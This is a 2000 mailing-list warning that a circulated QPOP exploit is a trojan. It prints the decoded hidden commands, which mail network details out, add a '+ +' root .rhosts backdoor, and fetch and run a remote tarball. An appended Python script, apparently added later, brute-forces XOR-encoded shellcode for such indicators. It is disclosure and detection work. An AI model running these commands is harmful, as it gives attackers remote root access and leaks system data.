Vulnerability Development mailing list archives
TROJAN WARNING: Re: QPOP2.5* exploit ??
From: nic () BELLAMY CO NZ (Nic Bellamy)
Date: Mon, 15 May 2000 11:13:50 +1200
The "shellcode" in this is a trojan - it is self-modifying (a simple xor) to obfuscate the real intention of the program, which is to run this code via "/bin/sh -c" on the local machine (reformatted for readability):

    /sbin/ifconfig -a | mail -s solwar etcownz () hotmail com >> /dev/null
    echo '+ +' >> ~root/.rhosts
    rcp lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar solwar.tar
    tar -xvf solwar* >> /dev/null
    cd solwar
    chmod +x solwar.sh
    ./solwar.sh >> /dev/null
    cd ..
    rm -rf solwar*

The "lp () skinner trdlnk com:/usr/spool/lp/model/solwar.tar" file does not appear to exist, so please don't flood their server trying to get it.

Regards,
Nic.

--
Nic Bellamy <nic () bellamy co nz>
Director, Bellamy Consulting Ltd.
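A static triage pass that surfaces this kind of hidden payload before a downloaded "exploit" is compiled or run, as an added example that is not part of the original message: it pulls the \xNN bytes out of a C source file, tries every single-byte XOR key, and reports the keys under which the bytes decode to shell commands. The single-byte key, the indicator list and the sample input are assumptions constructed here; the message says only "a simple xor".

```python
import re

# Strings taken from the commands quoted in the message above.
INDICATORS = (b"/bin/sh", b".rhosts", b"rcp ", b"mail -s", b"ifconfig")


def extract_c_bytes(source: str) -> bytes:
    """Collect the \\xNN escapes found in a C source file's string literals."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", source))


def printable_runs(data: bytes, min_len: int = 6):
    """Return runs of printable ASCII at least min_len bytes long."""
    return re.findall(rb"[\x20-\x7e\t\n]{%d,}" % min_len, data)


def xor_triage(blob: bytes):
    """Try every single-byte XOR key (0 = not encoded) and report the keys
    under which the blob decodes to text containing an indicator."""
    findings = []
    for key in range(256):
        decoded = bytes(b ^ key for b in blob)
        hits = [run.decode("ascii") for run in printable_runs(decoded)
                if any(ind in run for ind in INDICATORS)]
        if hits:
            findings.append((key, hits))
    return findings


def constructed_sample(key: int = 0x5A) -> str:
    """Constructed input, not the shellcode from the thread: four filler bytes
    followed by one command line from the message, XORed with `key`."""
    hidden = b"echo '+ +' >> ~root/.rhosts"
    body = bytes([0xEB, 0x1F, 0x5E, 0x31]) + bytes(b ^ key for b in hidden)
    return 'char shellcode[] = "' + "".join("\\x%02x" % b for b in body) + '";'


if __name__ == "__main__":
    blob = extract_c_bytes(constructed_sample())
    for key, hits in xor_triage(blob):
        for text in hits:
            print("key 0x%02x reveals: %r" % (key, text))
```

Multi-byte or rolling keys are outside what this pass covers; any hit means the code should not be run until the decoded text has been read in full.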